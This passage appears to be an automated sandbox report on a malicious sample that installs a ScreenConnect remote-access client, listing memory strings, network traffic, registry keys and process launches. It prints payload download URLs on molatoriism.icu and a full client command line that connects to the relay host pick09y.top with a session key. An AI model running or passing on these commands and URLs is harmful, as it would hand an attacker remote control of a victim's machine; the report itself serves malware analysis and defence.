                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1767483141.0000000001005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.application04
                  Source: dfsvc.exe, 00000001.00000002.2244765941.00000167686C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.application04l
                  Source: dfsvc.exe, 00000001.00000002.2244765941.00000167686C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.application089
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1767483141.0000000001005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.application08904l
                  Source: dfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.application17
                  Source: AI54ZOIT.log.1.drString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pick09y.top&p=8880&
                  Source: dfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationS
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1766714940.0000000000FB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationUZ
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1768380030.0000000002C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationX
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1767483141.0000000001005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationZ.L04re=
                  Source: dfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationplicat
                  Source: dfsvc.exe, 00000001.00000002.2244765941.00000167686C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationt
                  Source: dfsvc.exe, 00000001.00000002.2234906229.000001674E2A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationx
                  Source: dfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationxU
                  Source: dfsvc.exe, 00000001.00000002.2234906229.000001674E671000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2246161480.0000016768887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.dll
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1768380030.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, AI54ZOIT.log.1.drString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000001.00000002.2234906229.000001674E671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.ClientSe
                  Source: dfsvc.exe, 00000001.00000002.2234906229.000001674E671000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2246161480.0000016768887000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E13A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000001.00000002.2245764625.00000167687C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000001.00000002.2245764625.00000167687C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.ClientService.exeP
                  Source: dfsvc.exe, 00000001.00000002.2234906229.000001674E350000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2246395181.000001676A541000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E13A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Core.dll
                  Source: dfsvc.exe, 00000001.00000002.2246395181.000001676A541000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Core.dllF
                  Source: dfsvc.exe, 00000001.00000002.2234906229.000001674E671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Wind
                  Source: dfsvc.exe, 00000001.00000002.2234906229.000001674E671000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2246161480.0000016768887000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E13A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000001.00000002.2245232290.000001676872D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2245232290.000001676872D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configRi
                  Source: dfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exeR61fR
                  Source: dfsvc.exe, 00000001.00000002.2234906229.000001674E350000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2245876378.0000016768820000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E13A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2245876378.0000016768820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe6fffi
                  Source: dfsvc.exe, 00000001.00000002.2245232290.000001676872D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2245232290.000001676872D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exe.config0j
                  Source: dfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exeL6#f4
                  Source: dfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exel7
                  Source: svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                  Source: unknownHTTPS traffic detected: 104.21.96.148:443 -> 192.168.2.9:49727 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect

                  System Summary

                  barindex
                  Source: pzPO97QouM.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_009CA4950_2_009CA495
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887D027581_2_00007FF887D02758
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887D033B11_2_00007FF887D033B1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887CFAF4F1_2_00007FF887CFAF4F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887D15D1F1_2_00007FF887D15D1F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887D128701_2_00007FF887D12870
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887CFF4411_2_00007FF887CFF441
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887CF12401_2_00007FF887CF1240
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887D131011_2_00007FF887D13101
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887CF60501_2_00007FF887CF6050
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887CD70BA13_2_00007FF887CD70BA
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887CD10D713_2_00007FF887CD10D7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887CD10CF13_2_00007FF887CD10CF
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887FE039513_2_00007FF887FE0395
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887FE5BB113_2_00007FF887FE5BB1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887FE5DC413_2_00007FF887FE5DC4
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887FE299413_2_00007FF887FE2994
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887FE67DD13_2_00007FF887FE67DD
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7440 -ip 7440
                  Source: pzPO97QouM.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal57.evad.winEXE@18/75@2/3
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_009C1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_009C1000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\DeploymentJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7440
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\DeploymentJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCommand line argument: dfshim0_2_009C1000
                  Source: pzPO97QouM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\pzPO97QouM.exe "C:\Users\user\Desktop\pzPO97QouM.exe"
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7440 -ip 7440
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 756
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" "RunRole" "52c6258f-85a1-42d1-9479-cad4b97013ae" "User"
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe"Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7440 -ip 7440Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 756Jump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
